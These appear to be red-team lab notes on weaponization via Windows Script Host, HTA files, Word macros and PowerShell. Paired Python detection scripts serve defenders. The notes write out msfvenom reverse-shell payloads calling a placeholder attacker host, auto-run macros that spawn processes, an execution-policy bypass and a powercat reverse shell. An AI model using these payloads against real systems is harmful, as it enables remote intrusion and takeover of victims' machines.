Weaponization
Weaponization is when red teamers use their own crafted tools to exploit a target.
Windows Scripting Host (WSH)
Windows Scripting Host is a built-in Windows administration tool that runs script files to automate and manage tasks within the operating system. It uses VBScript.
Showing a message box
```vbscript
Dim message
message = "Hello"
MsgBox message
```
Run it in cmd:
wscript hello.vbs
Use it to run exe files
```vbscript
' Create a WScript.Shell object and use its Run method to start a process.
' Run takes the command, a window style (0 = hidden) and whether to wait for exit.
Set shell = WScript.CreateObject("WScript.Shell")
shell.Run "C:\Windows\System32\calc.exe " & WScript.ScriptFullName, 0, True
```
Execute it with wscript or cscript in cmd:
wscript c:\Users\thm\Desktop\calc.vbs
or
cscript.exe c:\Users\thm\Desktop\calc.vbs
If the .vbs extension is blacklisted, the script can be renamed to .txt and still run by naming the engine explicitly:
wscript /e:VBScript c:\Users\thm\Desktop\payload.txt
HTML Application (HTA)
Using an `ActiveXObject` to execute cmd.exe
```html
<html>
<body>
<script>
var c = 'cmd.exe';
new ActiveXObject('WScript.Shell').Run(c);
</script>
</body>
</html>
```
Serve the payload:
python3 -m http.server 8000
Visit the page from the target machine and run it:
http://IP-ATTACK-MACHINE:8000/payload.hta
Reverse shell
Create a reverse shell with msfvenom
msfvenom -p windows/x64/shell_reverse_tcp LHOST=IP-ATTACK-MACHINE LPORT=443 -f hta-psh -o thm.hta
Launch a listener:
nc -lvp 443
The reverse shell is launched when the link is visited from the target machine
Possible to generate and serve HTA with Metasploit framework
use exploit/windows/misc/hta_server
We need to set LHOST, LPORT, SRVHOST and the payload; we can use windows/meterpreter/reverse_tcp.
When the link is visited on the target we get a Meterpreter shell.
Visual Basic for Applications (VBA)
We need to use Word
We open the Visual Basic Editor by selecting View → Macros
We give our macro a name and click Create.
We then can make another message box
```vba
Sub MACRONAME()
MsgBox ("Message in a box")
End Sub
```
We run the macro with F5
To execute it automatically once the document is opened, we use the AutoOpen and Document_Open entry points:
```vba
Sub Document_Open()
MACRONAME
End Sub

Sub AutoOpen()
MACRONAME
End Sub

Sub MACRONAME()
MsgBox ("Message in a box")
End Sub
```
We save the document as .docm or .doc.
Execute a binary
```vba
Sub ExecBin()
Dim payload As String
payload = "calc.exe"
CreateObject("Wscript.Shell").Run payload, 0
End Sub
```
Use msfvenom for VBA
msfvenom -p windows/meterpreter/reverse_tcp LHOST=ATTACKING-MACHINE-IP LPORT=443 -f vba
We just need to copy the output into the macro.
We set the listener with msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
We also set LHOST and LPORT. When the document is opened on the target machine we get a shell.
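The macro, WSH and HTA payloads in these notes share two traits a defender can check for statically: an entry point that fires without a click (AutoOpen/Document_Open in VBA, an inline script block in an HTA, or simply being the file wscript/cscript is pointed at) and a WScript.Shell object whose .Run spawns a process. The following Python triage script is an added example, not part of the original notes or of any tool they mention; the `triage` function, its verdict levels and the sample sources (rebuilt from the snippets above) are constructed for illustration.

```python
"""Static triage of VBA / VBScript / HTA source for auto-run plus process spawn.

Added example, not part of the original notes. Looks for the two properties
the payloads above rely on: an entry point that runs on open, and a
WScript.Shell object whose .Run method starts a process.
"""
import re

# Entry points Office runs without user action once macros are enabled.
AUTO_EXEC = re.compile(
    r"\bSub\s+(AutoOpen|Auto_Open|AutoExec|Document_Open|Workbook_Open)\s*\(", re.I
)
# The two ways the snippets above instantiate a process-spawning object.
SHELL_OBJ = re.compile(
    r"""(CreateObject|new\s+ActiveXObject)\s*\(\s*["']WScript\.Shell["']\s*\)""", re.I
)
RUN_CALL = re.compile(r"\.Run\b", re.I)
HTA_SCRIPT = re.compile(r"<script\b", re.I)


def triage(source, kind):
    """Return (findings, verdict) for macro ('vba'), WSH ('vbs') or HTA ('hta') text."""
    findings = []
    if kind == "vba" and AUTO_EXEC.search(source):
        findings.append("auto-exec macro entry point")
    if kind == "hta" and HTA_SCRIPT.search(source):
        findings.append("inline script block (runs when the HTA opens)")
    if SHELL_OBJ.search(source):
        findings.append("WScript.Shell instantiated")
    if RUN_CALL.search(source):
        findings.append(".Run call")

    spawns = "WScript.Shell instantiated" in findings and ".Run call" in findings
    # A .vbs file executes as soon as wscript/cscript is pointed at it, so it
    # needs no separate entry point; macros and HTAs need one.
    auto = kind == "vbs" or any(
        f.startswith(("auto-exec", "inline script")) for f in findings
    )
    if spawns and auto:
        verdict = "high"
    elif spawns:
        verdict = "medium"
    else:
        verdict = "low"
    return findings, verdict


# Constructed samples mirroring the snippets in the notes (not real captures).
SAMPLES = {
    "hello.vbs": ('Dim message\nmessage = "Hello"\nMsgBox message\n', "vbs"),
    "calc.vbs": (
        'Set shell = WScript.CreateObject("WScript.Shell")\n'
        'shell.Run "C:\\Windows\\System32\\calc.exe", 0, True\n',
        "vbs",
    ),
    "macro_msgbox.vba": ('Sub AutoOpen()\n    MsgBox ("Message in a box")\nEnd Sub\n', "vba"),
    "macro_exec.vba": (
        "Sub AutoOpen()\n    ExecBin\nEnd Sub\n"
        "Sub ExecBin()\n    Dim payload As String\n    payload = \"calc.exe\"\n"
        '    CreateObject("Wscript.Shell").Run payload, 0\nEnd Sub\n',
        "vba",
    ),
    "payload.hta": (
        "<html><body><script>\nvar c = 'cmd.exe';\n"
        "new ActiveXObject('WScript.Shell').Run(c);\n</script></body></html>\n",
        "hta",
    ),
}


def triage_all(samples=SAMPLES):
    """Map each sample name to its verdict."""
    return {name: triage(src, kind)[1] for name, (src, kind) in samples.items()}


if __name__ == "__main__":
    for name, (src, kind) in SAMPLES.items():
        findings, verdict = triage(src, kind)
        print(f"{name:18} {verdict:6} {findings}")
```

The verdict only rises to "high" when both traits are present, so a macro that merely shows a message box on open stays "low" and a shell-spawning subroutine that still needs a manual F5 is "medium"; real triage would pair this with the macro extraction step (for example from a .docm container), which is out of scope here.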
PowerShell
To write something with PowerShell, we open a text editor and put this inside:
Write-Output "something"
We save the file with the .ps1 extension.
We can execute it from the cmd:
powershell -File thm.ps1
Execution policy
See if we are restricted:
Get-ExecutionPolicy
Change it:
Set-ExecutionPolicy -Scope CurrentUser RemoteSigned
We can also bypass it when executing the script:
powershell -ex bypass -File script.ps1
Getting a reverse shell
We can use powercat
We set up a listener
nc -lvp 443
We launch powercat
powershell -c "powercat -c ATTACKING-MACHINE-IP -p 443 -e cmd"
We should get a shell
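The WSH, HTA and PowerShell techniques above each leave a distinctive process-creation record: wscript/cscript given an engine override or a non-script extension, mshta.exe pulling an .hta from a URL, an Office application spawning a child process, and powershell.exe started with an execution-policy bypass or a powercat -e shell. The following Python detector is an added example, not code from the original notes; its event line format, the rule functions and the sample events are constructed to mirror the commands above (the IP-ATTACK-MACHINE and ATTACKING-MACHINE-IP placeholders are kept from the notes), and the Office child-process allowlist is a hypothetical starting point that needs tuning per environment.

```python
"""Process-creation rules for the WSH, HTA, Office macro and PowerShell tradecraft above.

Added example, not part of the original notes. The event format is a
constructed one-line-per-process text format, not a real sensor's output.
"""
import re
from pathlib import PureWindowsPath

EVENT_RE = re.compile(
    r'^(?P<ts>\S+) parent="(?P<parent>[^"]*)" image="(?P<image>[^"]*)" cmdline="(?P<cmdline>.*)"$'
)
SCRIPT_EXTS = {".vbs", ".vbe", ".js", ".jse", ".wsf", ".wsh"}
OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe"}
# Hypothetical allowlist of legitimate Office helpers; extend per environment.
OFFICE_BENIGN_CHILDREN = {"splwow64.exe"}
PS_BYPASS = re.compile(r"-(executionpolicy|exec|ex|ep)\s+bypass", re.I)


def parse_event(line):
    """Parse one constructed event line into a dict, or None if malformed."""
    m = EVENT_RE.match(line.strip())
    if not m:
        return None
    ev = m.groupdict()
    ev["image_name"] = PureWindowsPath(ev["image"]).name.lower()
    ev["parent_name"] = PureWindowsPath(ev["parent"]).name.lower()
    return ev


def rule_wsh(ev):
    """wscript/cscript with an engine override or run on a non-script extension."""
    if ev["image_name"] not in {"wscript.exe", "cscript.exe"}:
        return None
    cl = ev["cmdline"].lower()
    if "/e:" in cl:
        return "WSH engine override (/e:) - script extension may be disguised"
    # In the invocations above the last non-switch token is the script path.
    args = [a for a in cl.split() if not a.startswith(("/", "-"))][1:]
    if args and PureWindowsPath(args[-1]).suffix not in SCRIPT_EXTS:
        return "WSH run on a non-script extension"
    return None


def rule_mshta(ev):
    """mshta.exe loading an HTA straight from a URL."""
    if ev["image_name"] == "mshta.exe" and re.search(r"https?://", ev["cmdline"], re.I):
        return "mshta.exe loading an HTA from a URL"
    return None


def rule_office_child(ev):
    """An Office application spawning a child process (macro execution)."""
    if ev["parent_name"] in OFFICE_APPS and ev["image_name"] not in OFFICE_BENIGN_CHILDREN:
        return f"Office process {ev['parent_name']} spawned {ev['image_name']}"
    return None


def rule_powershell(ev):
    """Execution-policy bypass on the command line, or powercat binding a shell."""
    if ev["image_name"] not in {"powershell.exe", "pwsh.exe"}:
        return None
    if PS_BYPASS.search(ev["cmdline"]):
        return "PowerShell execution policy bypass on the command line"
    if re.search(r"powercat\b.*\s-e\s", ev["cmdline"], re.I):
        return "powercat with -e (shell bound to a socket)"
    return None


RULES = [rule_wsh, rule_mshta, rule_office_child, rule_powershell]


def detect(lines):
    """Return a list of (timestamp, reason) for every event that trips a rule."""
    alerts = []
    for line in lines:
        ev = parse_event(line)
        if ev is None:
            continue
        for rule in RULES:
            hit = rule(ev)
            if hit:
                alerts.append((ev["ts"], hit))
    return alerts


# Constructed sample events (not real telemetry), one per technique above.
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    r'2024-05-01T10:00:01 parent="C:\Windows\explorer.exe" image="C:\Windows\System32\wscript.exe" cmdline="wscript c:\Users\thm\Desktop\hello.vbs"',
    r'2024-05-01T10:00:02 parent="C:\Windows\explorer.exe" image="C:\Windows\System32\wscript.exe" cmdline="wscript /e:VBScript c:\Users\thm\Desktop\payload.txt"',
    r'2024-05-01T10:00:03 parent="C:\Windows\explorer.exe" image="C:\Windows\System32\mshta.exe" cmdline="mshta http://IP-ATTACK-MACHINE:8000/payload.hta"',
    r'2024-05-01T10:00:04 parent="C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE" image="C:\Windows\System32\calc.exe" cmdline="calc.exe"',
    rf'2024-05-01T10:00:05 parent="C:\Windows\explorer.exe" image="{PS}" cmdline="powershell -ex bypass -File script.ps1"',
    rf'2024-05-01T10:00:06 parent="C:\Windows\explorer.exe" image="{PS}" cmdline="powershell -File thm.ps1"',
    rf'2024-05-01T10:00:07 parent="C:\Windows\System32\cmd.exe" image="{PS}" cmdline="powershell -c "powercat -c ATTACKING-MACHINE-IP -p 443 -e cmd""',
]

if __name__ == "__main__":
    for ts, reason in detect(SAMPLE_EVENTS):
        print(ts, reason)
```

Of the seven constructed events only the plain `wscript hello.vbs` and `powershell -File thm.ps1` runs stay quiet; the other five each trip exactly one rule. The Office rule is deliberately broad (any non-allowlisted child), which is where most tuning effort lands in practice.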
A great tool to generate reverse shell payloads